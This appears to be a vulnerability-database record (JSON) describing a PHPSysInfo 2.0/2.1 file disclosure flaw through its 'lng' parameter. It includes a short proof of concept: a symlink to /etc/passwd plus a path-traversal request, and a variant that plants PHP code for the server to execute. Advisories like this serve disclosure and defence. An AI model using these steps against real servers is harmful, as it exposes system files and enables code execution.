{"lastseen": "2017-11-19T17:03:28", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.3}, "href": "https://www.seebug.org/vuldb/ssvid-76261", "references": [], "enchantments_done": [], "id": "SSV:76261", "title": "PHPSysInfo 2.0/2.1 Index.PHP LNG File Disclosure Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 16, "sourceData": "\n source: http://www.securityfocus.com/bid/7286/info\r\n\r\nPHPSysInfo has been reported to be vulnerable to a file disclosure issue.\r\n\r\nLocal users may be capable of influencing the include path for PHPSysinfo language include files. If the malicious language file is symlinked to a web server readable file, the contents of the linked file may be disclosed to the attacker. The file may also contain PHP code which may be executed in the context of the web server hosting the vulnerable application.\r\n\r\nThis attack may lead to confidential or sensitive information disclosure, which could be used to launch other attacks.\r\n\r\n~$ ln -s /etc/passwd /tmp/p.php\r\nhttp://www.example.com/index.php?lng=../../../../tmp/p\r\n\r\n\r\n~$ echo "<?php phpinfo() ?>" > /tmp/p.php\r\nhttp://www.example.com/index.php?lng=../../../../tmp/p \n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-76261", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647704671, "score": 1659785532, "epss": 1678850553}}